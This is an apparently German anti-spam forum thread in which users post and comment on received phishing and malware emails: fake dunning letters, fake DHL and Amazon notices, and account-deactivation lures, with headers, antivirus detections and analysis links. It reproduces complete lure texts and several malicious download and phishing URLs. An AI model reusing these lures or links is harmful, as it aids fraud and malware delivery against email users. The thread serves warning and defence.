Wenn man nun wissen will, ob der Anhang als Virus erkannt wird, dann kann man ihn - wenn man genau weiß was man tut und wie - in einem Giftschrank speichern und dort vor dem Ausführen vom Virenscanner prüfen lassen. D.h. erst den Virenscanner starten und diesen gezielt diese Datei prüfen lassen. Man weiß dann ggf. welches Haustier genau man vor sich hat. Wenn der Virenscanner nicht bellt, dann weiß man, dass es ein ganz neues Haustierchen ist. Ungefährlich ist das dann aber beileibe nicht.

Wer sich im Umgang mit dem Zeugs nicht wirklich auskennt, der fasst den Mist am besten überhaupt gar nicht an. D.h. Anhang nicht klicken und Mail sofort löschen.

Und bitte niemals die Fähigkeiten der Virenscanner überschätzen, das gilt auch für die guten wie Kaspersky.

kjz1
16.06.2016, 20:18
Und bitte niemals die Fähigkeiten der Virenscanner überschätzen, das gilt auch für die guten wie Kaspersky.

Denn: selbstverständlich lassen die 'Bösen Jungs' (TM) auch Virenscnner über ihre neuesten 'Kreationen' laufen; und was da erkannt wird, wird erst gar nicht in die freie Wildbahn hinausgeblasen.

truelife
09.08.2016, 10:08
Ach, unsere ukrainisch-russischen Cyber-Mafiosi sind wieder da:


Sehr geehrte/r [echter Vorname] [echter Nachname],

leider haben wir festgestellt, dass die Zahlungserinnerung Nummer 676851278 bislang ergebnislos blieb. Heute gewähren wir Ihnen nun letztmalig die Chance, den ausbleibenden Betrag der Firma GiroPay24 AG zu decken.

Verbindliche Personalien:

[echter Vorname] [echter Nachname]
[alte Anschrift]
[alte Anschrift]

Tel. [alte Telefonnummer]

Aufgrund des andauernden Zahlungsausstands sind Sie gezwungen dabei, die durch unsere Inanspruchnahme entstandene Kosten von 71,23 Euro zu bezahlen. Bei Fragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von zwei Werktagen. Um zusätzliche Mahnkosten zu vermeiden, bitten wir Sie den ausstehenden Betrag auf unser Konto zu überweisen. Berücksichtigt wurden alle Buchungen bis zum 05.08.2016.

Wir erwarten die vollständige Zahlung einbegriffen der Gebühren bis zum 12.08.2016 auf unser Konto. Können wird bis zum genannten Datum keine Überweisung bestätigen, sehen wir uns gezwungen unsere Forderung an ein Gericht abzugeben. Alle damit verbundenen Kosten werden Sie tragen müssen.

Die vollständige Kostenaufstellung Nummer 676851278, der Sie alle Einzelpositionen entnehmen können, fügen wir bei.

Falls sich dieses Schreiben mit Ihrer Zahlung überschnitten haben, betrachten Sie es bitte als gegenstandslos.

Mit freundlichen Grüßen

Stellvertretender Rechtsanwalt Leo Baumann

Return-Path: <support [at] paypal.de>
Received: from ghost.techiedistrict.com ([104.131.95.240]) by mx-ha.gmx.net (mxgmx105) with ESMTP (Nemesis) ID: [ID filtered]
Received: by ghost.techiedistrict.com (Postfix, from userID: [ID filtered]
Date: Mon, 8 Aug 2016 xx:xx:xx +0100
To: [echter Vorname] [echter Nachname] <*snip*@gmx.de>
From: Stellvertretender Rechtsanwalt GiroPay24 AG <support [at] paypal.de>
Subject: Rechnung noch offen 08.08.2016 Nr. 67685127
Message-ID: [ID filtered]
X-Priority: 3
X-Mailer: Apple Mail
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1_218e5ca77482f8c88550b581ac85b24f"
Content-Transfer-Encoding: 7bit
Envelope-To: <*snip*@gmx.de>

Beigefügt ist ein Zip-Archiv, darin - o Wunder - aber keine Rechnung, sondern ein Trojaner.

truelife
09.08.2016, 16:20
@Home habe ich dann mal reingeschaut. Im Zip-Archiv steckt die Ransomware "Nymaim".

carsten.gentsch
11.08.2016, 16:12
Hallo so eben schon zum2ten male aufgeschlagen.
Benutzt wird wie imemer einer gecrackte Wp oder Shop version.
www.monparfum.it

Man möge doch das Dokument runterladen ;)

Received: from localhost (unknown [123.26.212.18])
by me (Postfix) with SMTP ID: [ID filtered]
for <me>; Thu, 11 Aug 2016 xx:xx:xx +0200 (MEST)
Received: from unknown (HELO localhost) (victoria [at] trah.co.uk@78.50.225.56)



Sehr geehrter Kunde!
Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine
ungedeckte Rechnung bei Deutsche Bank.
Bitte laden Sie die Datei aus dem Link:
Url der Seite und dann */info.doc


Habs natürlich gelassen ;) den bei dem text sollte jede rmerken das hier was nicht stimmt aber Dumme gibts immer.

schara56
17.11.2016, 07:57
Received: from mout.kundenserver.de (mout.kundenserver.de [212.227.126.134])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Thu, 17 Nov 2016 xx:xx:xx +0100 (CET)
Received: from infong760.kundenserver.de (infong760.kundenserver.de [212.227.66.236])
by mrelayeu.kundenserver.de (node=mreue006) with ESMTP (Nemesis)
ID: [ID filtered]
Received: from 195.154.207.73 (IP may be forged by CGI script)
by infong760.kundenserver.de with HTTP
ID: [ID filtered]

*Sehr geehrte/r x,*

bedauerlicherweise mussten wir feststellen, dass unsere Zahlungsaufforderung ID: [ID filtered]
549318349 bislang ohne Reaktion Ihrerseits blieb. Heute gewähren wir Ihnen nun
letztmalig die Möglichkeit, den ausbleibenden Betrag unseren Mandanten Bank-Pay
AG zu decken.

Aufgrund des andauernden Zahlungsrückstands sind Sie gezwungen außerdem, die
durch unsere Tätigkeit entstandene Gebühren von 86,05 Euro zu bezahlen. Bei
Rückfragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb von
drei Tagen. Um weitete Kosten zu vermeiden, bitten wir Sie den ausstehenden
Betrag auf unser Bankkonto zu überweisen. Berücksichtigt wurden alle
Buchungseingänge bis zum 16.11.2016.

Damit fordern wir Sie nachdrücklich auf, den offenen Betrag umgehend bis zum
23.11.2016 zu decken. Können wird bis zum genannten Datum keine Überweisung
einsehen, sehen wir uns gezwungen Ihren Fall an ein Gericht abzugeben. Alle
damit verbundenen Zusatzkosten werden Sie tragen müssen.

*Gespeicherte Vertragsdaten:*

Alte aber korrekte Postanschrift

Telefon: Alte aber korrekte Telefonnummer

Die detaillierte Kostenaufstellung NR. 549318349, der Sie alle Positionen
entnehmen können, ist beigefügt.

Mit freundlichen Grüßen

Beauftragter Rechtsanwalt K* H*


Diese E-Mail ist nur für den Empfänger bestimmt, an den sie gerichtet ist und
kann vertrauliches bzw. unter das Berufsgeheimnis fallendes Material enthalten.
Im Anhang dann eine ZIP-Datei welche gem. virustotal nur von drei der 56 Virenscannern als Schadsoftware eingestuft wird.

Baidu Win32.Trojan.WisdomEyes.16070401.9500.9994 20161117
Invincea trojan.win32.skeeyah.a!bit 20161018
McAfee-GW-Edition BehavesLike.MysticCompressor.gc 20161116

Ich mach mit
04.01.2017, 12:45
Achtung Vorsicht !!!

Absender:
(mailto; Paket [at] DHL.de)

Von: DHL-Express
Datum: 04.01.2017 xx:xx:xx

Betreff: DHL - Sendungsbenachrichtigung

Täuschend echt aussehende Benachrichtigungsmail, mit Angabe einer (falschen) Sendungsnummer.

Ein Hinweis auf einen Foto Laden als Absender der Ware in meinem Beispiel

"Es werden 299,- Euro von Ihrem Konto abgebucht, um den Versand zu stornieren kontaktieren Sie den Händler.

Die Sendung wird am 04.01.17 zwischen 11-13.00 Uhr voraussichtlich zugestellt."


Die komplette Mail ist infiziert - egal ob auf den Link der Sendungsverfolgung geklickt wird - oder nicht - in jedem Bereich wird man "weitergeleitet".

blizzy
04.01.2017, 19:24
Die Mail ist vermutlich nicht "komplett infiziert", sie dürfte eher nur aus einem Bild bestehen, das weiter verlinkt. Was wiederum die Frage aufwirft, warum du dir die Mails als html anzeigen läßt. Abgesehen davon ist der von dir angegebene Absender mit an Sicherheit grenzender Wahrscheinlichkeit gefälscht.

schara56
08.02.2017, 06:47
Received: from h2221975.stratoserver.net (h2221975.stratoserver.net [85.214.69.35])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Wed, 8 Feb 2017 xx:xx:xx +0100 (CET)
Received: by h2221975.stratoserver.net (Postfix, from userID: [ID filtered]
ID: [ID filtered]

Sehr geehrte(r) x,

bedauerlicherweise mussten wir feststellen, dass unsere Zahlungsaufforderung
NR717485466 bislang ohne Reaktion Ihrerseits blieb. Jetzt geben wir Ihnen damit
letztmalig die Chance, den ausstehenden Betrag der Firma Amazon AG zu decken.

Aufgrund des bestehenden Zahlungsverzug sind Sie gezwungen zusätzlich, die durch
unsere Inanspruchnahme entstandene Gebühren von 93,34 Euro zu bezahlen. Bei
Fragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb von 24
Stunden. Um weitete Mahnkosten zu vermeiden, bitten wir Sie den ausstehenden
Betrag auf unser Konto zu überweisen. Berücksichtigt wurden alle
Buchungseingänge bis zum 06.02.2017.

*Gespeicherte Daten:*

Alte Postanschrift

Tel. Alte Telefonnummer

Überweisen Sie den aussehenden Betrag unter Angaben der Rechnungsnummer so
rechtzeitig, dass dieser spätestens zum 13.0 2.2017 auf unserem Konto verbucht
wird. Können wird bis zum genannten Datum keine Überweisung bestätigen, sind wir
gezwungen Ihren MahnbescheID: [ID filtered]
zusätzliche Kosten werden Sie tragen.

*Die detaillierte Forderungsausstellung Nr. 717485466, der Sie alle Buchungen
entnehmen können, ist beigefügt.
*
Mit verbindlichen Grüßen

Stellvertretender Rechtsanwalt N* W*
Im Anhang eine obligatorische ZIP-Datei.
Die Erkennungsrate ist recht dürftig:
Sophos 07.02.2017 Troj/Bredo-ABW
Invincea 03.02.2017 virus.win32.expiro.dz

Nanni
08.02.2017, 07:22
Immer wieder lustig:

>> sind wir gezwungen Ihren MahnbescheID: [ID filtered]

Null Ahnung von Nichts...

kjz1
08.02.2017, 09:04
Vor allem, wenn die immer nur einen 'stellvertretenden Rechtsanwalt' aufbieten können. Einen Richtigen kann man sich wohl nicht leisten...

truelife
05.04.2017, 08:10
Aktuell werden gut gefälschte DHL-Sendungsbenachrichtigungen verschickt. Es wird darin mitgeteilt, dass sich der Zustellzeitpunkt für ein Paket geändert hat.

Die Mail ist zweimal hier angekommen, die Absenderangaben weichen aber von denen der DHL ab (DHL Fachteam / DHL Team).

Auch der angezeigte Link ist ähnlich dem der DHL:

Fake: https://nolb.dhl.de/nextt-online-public.do?time=125601&email=*snip*. (JavaScript Report)
Echt: https://nolp.dhl.de/nextt-online-public.do?*snip*

Bei Klick auf dem Link wird ein Javascript nachgeladen. Auswertung bei Virustotal: https://www.virustotal.com/en/file/063afc48e24de77e7a388f1332ea851b2457b4a00463d6c3745682b98a276f92/analysis/ & Auswertung bei Hybrid-Analysis: https://www.hybrid-analysis.com/sample/063afc48e24de77e7a388f1332ea851b2457b4a00463d6c3745682b98a276f92?environmentId=1 00

Diese Javascript lädt eine *.exe-Datei nach und startet diese. Derzeit ist das eine "0815.exe":

Auswertung bei Virustotal: https://www.virustotal.com/en/file/534a3697b3803796d2caa1cdf866ea34900c0e01392c964613d0004188e61c84/analysis/1491300282/ & Auswertung bei Hybrid-Analysis: https://www.hybrid-analysis.com/sample/534a3697b3803796d2caa1cdf866ea34900c0e01392c964613d0004188e61c84?environmentId=1 00

Interessant sind die serbischen Programmierhinweise und die Selbstbezeichnung als "profit organization that helps the children of Haiti have a brilliant future."

heinrichh
05.05.2017, 21:37
Geradeeingeschlagen:
eineMail von „"Beauftragter Rechtsanwalt Online Pay GmbH"
mit demBetreff „Ihre Rechnung NR........“:


<===schnipp
Return-Path:<billing [at] ebay.com>
Received:from gproxy2.mail.unifiedlayer.com ([69.89.18.3]) by mx-ha.gmx.net
Return-Path:<billing [at] ebay.com>
Received:from gproxy2.mail.unifiedlayer.com ([69.89.18.3]) by mx-ha.gmx.net
(mxgmx014[212.227.15.9]) with ESMTPS (Nemesis) ID: [ID filtered]
for<xxxxxxxxxxxxxxxxxx [at] gmx.de>; Fri, 05 May 2017 xx:xx:xx +0200
Received:from cmgw3 (unknown [10.0.90.84])
bygproxy2.mail.unifiedlayer.com (Postfix) with ESMTP ID: [ID filtered]
for<xxxxxxxxxxxxxxxxxx [at] gmx.de>; Fri, 5 May 2017 xx:xx:xx -0600(MDT)
Received:from box1304.bluehost.com ([50.87.249.104])
bycmgw3 with
idyyyyyyyyyyyyyy; Fri, 05 May 2017 xx:xx:xx -0600
X-Authority-Analysis(…)
Received:from raviniaw by box1304.bluehost.com with local (Exim 4.87)
(envelope-from<billing [at] ebay.com>)
idyyyyyyyyyyyy
forxxxxxxxxxxxxxxxxxx [at] gmx.de; Fri, 05 May 2017 xx:xx:xx -0600
Date:Fri, 5 May 2017 xx:xx:xx -0600
To: [EMAIL="poor [at] spamvictim.tld"]poor [at] spamvictim.tld
From:Beauftragter Rechtsanwalt Online Pay GmbH <billing [at] ebay.com>
Subject:Ihre Rechnung NR.........
===>schnapp


mit demText Rechnung … zusätzliche Kosten … binnen drei Tagen …schlimme Konsequenzen …. bla bla bla, und das obligatorische ZIPals Attach.


Interessant:im „Anschreiben“ sind PLZ, Ort, Strasse und Hausnummer korrekt,und ich habe eine einigermaßen exotische Adresse. Das habe ich nochnicht erlebt; hat jemand eine Idee, wo die meine Adresse herhabenkönnten?

kjz1
06.05.2017, 13:28
Wenn man mal einige Postings zurück liest, da wurde Datenbanken von großen Email-Anbietern gecrackt. Und ja, mit Adresse und mit Telefonnr.

heinrichh
06.05.2017, 17:38
Danke,kjz1: normalerweise predige ich immer „steht ein paar Postingsvorher; Lesen bildet“... :-) Entschuldigung!

schara56
23.05.2017, 05:39
Received: from 10-64-1-16.phx.dedicated.codero.com (mail.bel.com.bd [216.55.167.101])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 23 May 2017 xx:xx:xx +0200 (CEST)
Received: from webmail.magpiegroupbd.com (localhost [IPv6:::1])
by 10-64-1-16.phx.dedicated.codero.com (Postfix) with ESMTPA ID: [ID filtered]
Mon, 22 May 2017 xx:xx:xx -0700 (MST)

Nette Zip im Anhang mit geringer Erkennungsrate:

Ikarus Win32.Outbreak 20170522
Invincea virtool.win32.injector.fq 20170519
Rising Malware.Undefined!8.C (cloud:fto1t214MvF) 20170523
TrendMicro-HouseCall Cryp_Cerber-VB1 20170523

schara56
25.05.2017, 13:02
Received: from mail.ptsg.co.ID: [ID filtered]
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Thu, 25 May 2017 xx:xx:xx +0200 (CEST)
Received: from webmail.ptsg.co.ID: [ID filtered]
(Authenticated sender: lab [at] ptsg.co.id)
by mail.ptsg.co.ID: [ID filtered]
Thu, 25 May 2017 xx:xx:xx +0700 (WIT)
Im Anhang: New Order 00BY1621.arj

AegisLab Troj.W32.Generic!c 20170525
ESET-NOD32 a variant of Win32/GenKryptik.AHTT 20170525
Fortinet W32/Generic.M!tr 20170525
Ikarus Win32.Outbreak 20170525
Invincea virtool.win32.injector.fq 20170519
Kaspersky HEUR:Trojan.Win32.Generic 20170525
TrendMicro-HouseCall Suspicious_GEN.F47V0525 20170525
ZoneAlarm by Check Point HEUR:Trojan.Win32.Generic 20170525

schara56
11.07.2017, 17:02
Received: from ns1.banglanetbd.net (ns1.banglanetbd.net [75.126.46.114])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 11 Jul 2017 xx:xx:xx +0200 (CEST)
Received: from toroon63-1279381429.sdsl.bell.ca ([76.65.207.181]:2870 helo=dsenorthern.co.uk)
by ns1.banglanetbd.net with esmtpa (Exim 4.87)
(envelope-from <enquiries [at] dsenorthern.co.uk>)
ID: [ID filtered]
for x; Tue, 11 Jul 2017 xx:xx:xx -0500
Received: from ns1.banglanetbd.net (ns1.banglanetbd.net [75.126.46.114])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 11 Jul 2017 xx:xx:xx +0200 (CEST)
Received: from toroon63-1279381429.sdsl.bell.ca ([76.65.207.181]:1491 helo=dsenorthern.co.uk)
by ns1.banglanetbd.net with esmtpa (Exim 4.87)
(envelope-from <enquiries [at] dsenorthern.co.uk>)
ID: [ID filtered]
for x; Tue, 11 Jul 2017 xx:xx:xx -0500
https://deref-mail.com/mail/client/*schnapp*/dereferrer/?redirectUrl=
https://deref-mail.com/mail/client/*schnapp*/dereferrer/?redirectUrl=
https://deref-mail.com/mail/client/*schnapp*/dereferrer/?redirectUrl=
https://deref-mail.com/mail/client/*schnapp*/dereferrer/?redirectUrl=
https://deref-mail.com/mail/client/*schnapp*/dereferrer/?redirectUrl=
http://www.rickmers-reederei.com

Im Anhang ein HTML-Dokument mit folgendem Download:
http://www.crackmiata.com/z/KW128.jar

Dort heißt es dann

This Account has been suspended.
Contact your hosting provider for more information.

schara56
29.07.2017, 14:09
Received: from mail.misc.go.th (58-97-113-102.static.asianet.co.th [58.97.113.102])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Sat, 29 Jul 2017 xx:xx:xx +0200 (CEST)
Received: from postoffice.com (unknown [84.38.130.246])
(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
(No client certificate requested)
by mail.misc.go.th (Postfix) with ESMTPSA ID: [ID filtered]
for <x>; Fri, 28 Jul 2017 xx:xx:xx +0700 (ICT)

Server Message

*Dear ***schnapp**

Our record indicates that you recently made a request to shutdown your email
account(**schnapp**). And this request will be processed shortly.

If this request was made accidentally and you have no knowledge of it, you are
advised to cancel the request now

Cancel De-activation http://smpeducation.com/test/crypt/index.html?email=%0%>

However, if you do not cancel this request, your account will be shutdown
shortly and all your email data will be lost permanently.

Regards.
*Email Administrator*

--------------------------------------------------------------------------------

This message is auto-generated from E-mail security server, and replies sent to
this email can not be delivered.
This email is meant for: **schnapp**

schara56
31.07.2017, 12:35
Received: from lserver228.megavelocity.net (lserver228.megavelocity.net [205.204.76.173])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Sun, 30 Jul 2017 xx:xx:xx +0200 (CEST)
Received: from [162.248.244.226] (port=25762)
by lserver228.megavelocity.net with esmtpa (Exim 4.89)
(envelope-from <shanti [at] swiftcargo.com>)
ID: [ID filtered]

Dear Sir,

Attn : All


Please note that they have provided shipment Billing Details at the time
So see enclosed/Attached file BL Draft, Also if GST Registration details are provided, All you will fine as per attached .
please freview attached and forward the same soon to ensure Hassle Free BL release and to provide Invoices on time.

Please note that we will be able to amend any request for change of Customer Name, Address, GSTIN, etc, on the Invoice.

Thanks & Regards,
S* N*
Asst Manager- Customer Service


Gundecha Onclave, 3C2 C Wing,
Kherani Road, Saki Naka
Andheri (East),
Mumbai 400072
Im Anhang eine "AGP MOSAIC FANTIN SHIP CAG LOTSMV SAILING.r11" mit folgendem Inhalt:
https://www.virustotal.com/de/file/ee8104e02abb540082e70e6abecdc9fda492f791bcb82f4f8b201a45383ecfe6/analysis/

schara56
02.08.2017, 07:05
Received: from qoa-mxgw.safaricombusiness.co.ke (posta.safaricombusiness.co.ke [197.248.254.164])
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Tue, 1 Aug 2017 xx:xx:xx +0200 (CEST)
X-IronPort-AV: E=Sophos;i="5.39,386,1493683200";
d="scan'208,217";a="1713868"
Received: from host24.safaricombusiness.co.ke ([197.248.5.24])
by qoa-mxgw.safaricombusiness.co.ke with ESMTP; 01 Aug 2017 xx:xx:xx +0300
Received: from [::1] (port=45453 helo=host24.safaricombusiness.co.ke)
by host24.safaricombusiness.co.ke with esmtpa (Exim 4.89)
(envelope-from <emailteamsarah007 [at] gmail.com>)
ID: [ID filtered]

Email De-Activation

DEAR EMAIL USER

Our Data Base shows a shutdown request made by you to our technical team
asking us to immediately shut down your E-mail account. This request
will be processed shortly.

If this request was made accidentally or you have no knowledge of it,
you are advised to undo De-Activation now.

Undo De-Activation [1]

Note: if you do not Undo this request, your account will be disabled
shortly and all your email data will be lost permanently.

Regards.
E-MAIL SERVICES.

-------------------------

This message is auto-generated from E-mail security server, and replies
sent to this email can not be delivered.
This email is meant for our Email subscriber only.



Links:
------
[1] https://dashingboutique.in/pp/crypt/index.html

schara56
07.08.2017, 05:30
Received: from lynxauto_1.norjac.co.uk (host81-136-165-69.in-addr.btopenworld.com [81.136.165.69])
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Mon, 7 Aug 2017 xx:xx:xx +0200 (CEST)
Received: from IP-220-69.dataclub.biz ([46.183.220.69]) by lynxauto_1.norjac.co.uk with Microsoft SMTPSVC(6.0.3790.3959);
Mon, 7 Aug 2017 xx:xx:xx +0100

Server Message

Dear x Our record indicates that you recently made a request to shutdown your email (x). And this request will be processed shortly. If this request was made accidentally and you have no knowledge of it, you are advised to cancel the request now

Cancel De-activation

However, if you do not cancel this request, the your account will be shutdown shortly
and all your email data will be lost permanently. Regards.
Email Administrator

This message is auto-generated from E-mail security server, and replies sent to this email can not be delivered.
This email is meant for: x
http://www.pustaka.uninus.ac.id/Wp-manager/Domain/crypt/index.html?userid=3D*schnapp* (103.28.12.77)

schara56
18.09.2017, 14:59
Received: from mout-xforward.kundenserver.de ([82.165.159.8]) by mx-ha.gmx.net
(mxgmx115 [212.227.17.5]) with ESMTPS (Nemesis) ID: [ID filtered]
for <x>; Mon, 18 Sep 2017 xx:xx:xx +0200
Received: from 10.0.0.25 ([152.115.50.2]) by mrelayeu.kundenserver.de
(mreue001 [212.227.15.167]) with ESMTPSA (Nemesis) id
0MgCdZ-1e5la80FGv-00NV6Z for <x>; Mon, 18 Sep 2017 xx:xx:xx
+0200

Guten Tag,

Im Anhang dieser E-Mail finden Sie eine .DOC-Datei mit den gewünschten Informationen.

Rech:
http://aishomiura.com/gescanntes-Dokument-*schnapp*/
*schnapp*

Mit freundlichen Grüße

Nachtrag:
Siehe auch Heise.de (https://heise.de/-3834782)

kjz1
07.11.2017, 09:59
Received: from mtaout006-public.msg.strl.va.charter.net
(mtaout006-public.msg.strl.va.charter.net [68.114.190.31])
by xxxxx (Postfix) with ESMTP
for <xxxxx>; Tue, 7 Nov 2017 xx:xx:xx +0100 (CET)
Received: from imp04 ([64.210.232.14]) by mtaout006.msg.strl.va.charter.net
(InterMail vM.9.00.023.01 201-2473-194) with ESMTP
ID: [ID filtered]
for <xxxxx>; Tue, 7 Nov 2017 xx:xx:xx -0600
Received: from 10.0.0.59 ([196.200.27.170])
by imp04 with ID: [ID filtered]


Guten Tag,
der Zustelltermin für Ihr Paket hat sich auf Dienstag, 15:00-19:00 Uhr
geändert.

Unter folgender Adresse können Sie den Status Ihres Pakets verfolgen:
http://benit.biz/DHL-number/.

IP: 192.195.77.97 ---> perfora.net

Es soll dann eine verseuchte Word Datei (DHL Express - Dienstag, 11_00-19_00 Uhr.doc; mit Nachladen von http://leaderschool.cn) heruntergeladen werden. Die Erkennungsrate ist noch mau.

https://virusscan.jotti.org/de-DE/filescanjob/up1l8iv515

https://www.virustotal.com/#/file/f6cd0afe4bdcc3ce2d3380abebf9a1344e942c943b30659bf491682ffb978910/detection

https://www.hybrid-analysis.com/sample/f6cd0afe4bdcc3ce2d3380abebf9a1344e942c943b30659bf491682ffb978910?environmentId=1 00

schara56
08.11.2017, 10:42
Received: from vps17837.inmotionhosting.com (vps17837.inmotionhosting.com [172.81.118.177])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by X (Postfix) with ESMTPS ID: [ID filtered]
for <X>; Wed, 8 Nov 2017 xx:xx:xx +0100 (CET)
Received: from tdmonl5 by vps17837.inmotionhosting.com with local (Exim 4.89)
(envelope-from <bestellbestaetigung [at] amazon.de>)
ID: [ID filtered]
for X; Wed, 08 Nov 2017 xx:xx:xx -0500

Sehr geehrte/r X,

vielen Dank für Ihren Kauf. Sie finden weitere Details in der angefügten Rechnung. Wir werden Sie sofort benachrichtigen, sobald Ihr(e) Bestellung versandt wurde(n).

Wir freuen uns auf Ihren nächsten Besuch.
Im Anhang eine "X Amazon 07.11.2017.zip"
https://virusscan.jotti.org/de-DE/filescanjob/rd34w1bdse

schara56
20.07.2018, 06:08
Received: from linux767.grserver.gr (linux767.grserver.gr [185.4.133.60])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Fri, 20 Jul 2018 xx:xx:xx +0200 (CEST)
Received: from webmail.profilm-pack.gr (localhost [IPv6:::1])
by linux767.grserver.gr (Postfix) with ESMTPA ID: [ID filtered]
Fri, 20 Jul 2018 xx:xx:xx +0300 (EEST)

Dear Sir,

Your payment is scheduled to be made tomorrow (21/07/2018), by our
finance department.

On that note, as instructed by our principals,

kindly crosscheck the attached bank account details to be sure we are

remitting to right designated bank account so as to proceed with payment

ASAP.

Note: Your prompt response to this matter will be highly appreciated.

Thanks & best regards

B* M*
THE HEAD OF PERSONAL BANKING AND REMITTANCE

************************************************
HSBC UK Bank plc
Registered Office: 1 Centenary Square, B1 1HQ.
Rgistered in England -Number 9928412.

************************************************

Im Anhang eine Telex Copy.jar.

kjz1
27.08.2018, 11:06
Da wurden wohl Adressbücher gecrackt, denn die Mail kam (angeblich) von einem mir bekannten Absender:

Received: from mail.medismart.com.tr (ns1.medismart.com.tr [217.116.202.27])
by xxxxx (Postfix) with ESMTPS
for <x>; Mon, 27 Aug 2018 xx:xx:xx +0200 (CEST)
Received: from 10.0.55.60 ([46.134.145.155]) by medismart.com.tr with
MailEnable ESMTPA; Mon, 27 Aug 2018 xx:xx:xx +0300


Guten Morgen,

Vielen Dank für Ihre schnelle Rückmeldung, leider gibt das letzte mit
gesendete Schreiben keine Beantwortung der Frage wieder.
Wunschgemäß übersenden wir Ihnen in der Anlage Ihre aktuelle Rechnung
als DOC-Dokument.

Bei Fragen zu Rechnungen können Sie mich gerne kontaktieren.

Im Anhang dann eine Skript verseuchte Word-Datei als angebliche Rechnung.

truelife
05.10.2018, 14:57
Diesmal angeblich vom Antispam-Hoster Manitu:

Return-Path: <buchhaltung [at] manitu.de>
Received: from server.idear.com.ec ([23.235.206.239]) by mx-ha.gmx.net (mxgmx017 [212.227.15.9]) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from server.idear.com.ec ([23.235.206.239]) by mx-ha.gmx.net (mxgmx017 [212.227.15.9]) with ESMTPS (Nemesis) ID: [ID filtered]

Das beigefügte PDF ist sauber, enthält aber einen Link auf www.hospedarecuador.com/aude/index.php - angeblich ein Online-Dukument.

Arthur
24.10.2018, 09:22
Heute eingetrudelt

Abrechnung Nr. 0606141617 vom 24.10.2018
1 Anhang 871,0 KB


Hiermit fordern wir Sie auf, den offenen Betrag umgehend bis zum 31.10.2018 zu decken. Können wird bis zum genannten Datum keine Zahlung bestätigen, sehen wir uns gezwungen Ihren Fall an ein Gericht abzugeben. Sämtliche damit verbundenen Zusatzkosten werden Sie tragen müssen.
Um zusätzliche Mahnkosten auszuschließen, bitten wir Sie den ausstehenden Betrag auf unser Bankkonto zu überweisen. Aufgrund des bestehenden Zahlungsrückstands sind Sie angewiesen, die entstandene Kosten von 23,25 Euro zu tragen.

Berücksichtigt wurden alle Zahlungen bis zum 23.10.2018.
Ihre persönliche Rechnung liegt dieser E-Mail bei.

Bitte beachten Sie, dass Ihre Rechnung nur dann beglichen ist, wenn Ihre Zahlung auf unser Konto erfolgt.

Mit verbindlichen Grüßen

Safecharge GmbH & Co. KG
88250 Weingarten
USt-ID: [ID filtered]
Sitz der Gesellschaft: Weingarten
Ist bekannt: https://www.onlinewarnungen.de/warnungsticker/mahnung-vom-rechtsanwalt-im-auftrag-der-pay-online24-gmbh-ist-ein-virus/ (https://www.antispam-ev.de/forum/redirector.php?url=https%3A%2F%2Fwww.onlinewarnungen.de%2Fwarnungsticker%2Fmahnu ng-vom-rechtsanwalt-im-auftrag-der-pay-online24-gmbh-ist-ein-virus%2F)
Im Anhang


Vorsicht Virus: Mahnung der Paydirect GbR, Safecharge GmbH, Easypay GmbH
Haben irgendwie meine nicht gelistete Telefonnummer erbeutet, die ich nur bei einigen wenigen Bestellungen angeben habe.

Ähnliche Mahndrohungen sind schon länger bekannt
https://www.watchlist-internet.at/news/rechnungen-von-erfundenen-unternehmen-verbreiten-trojaner/ (https://www.antispam-ev.de/forum/redirector.php?url=https%3A%2F%2Fwww.watchlist-internet.at%2Fnews%2Frechnungen-von-erfundenen-unternehmen-verbreiten-trojaner%2F)

Rechnungen von erfundenen Unternehmen verbreiten Trojaner
Gepostet am 10.07.2015 von Watchlist Internet
Themen: Schadsoftware, Gefälschte Rechnungen, Scamming, E-Mail

kjz1
21.01.2019, 09:29
Received: from smtprelay07.ispgateway.de (smtprelay07.ispgateway.de
[134.119.228.97])
by xxxxx (Postfix) with ESMTPS
for <x>; Mon, 21 Jan 2019 xx:xx:xx +0100 (CET)
Received: from [193.126.247.233] (helo=10.3.15.100)
by smtprelay07.ispgateway.de with esmtpsa
(TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256)
(Exim 4.90_1)
(envelope-from <info [at] halbritter-gmbh.de>)
ID: [ID filtered]
for x; Mon, 21 Jan 2019 xx:xx:xx +0100


Guten Tag,

wir möchten Ihnen hiermit mitteilen, dass reBuy reCommerce GmbH Ihre Bestellung
verschickt hat.

Ihre Sendung befindet sich nun auf dem Versandweg; eine Änderung durch Sie oder
unseren Kundenservice ist nicht mehr möglich. Möchten Sie einen ansehen Ihrer
Bestellung, können Sie dies einfach hier.

Zustellung:
*Dienstag, 22 Januar -
Donnerstag, 24 Januar *


Bestelldetails
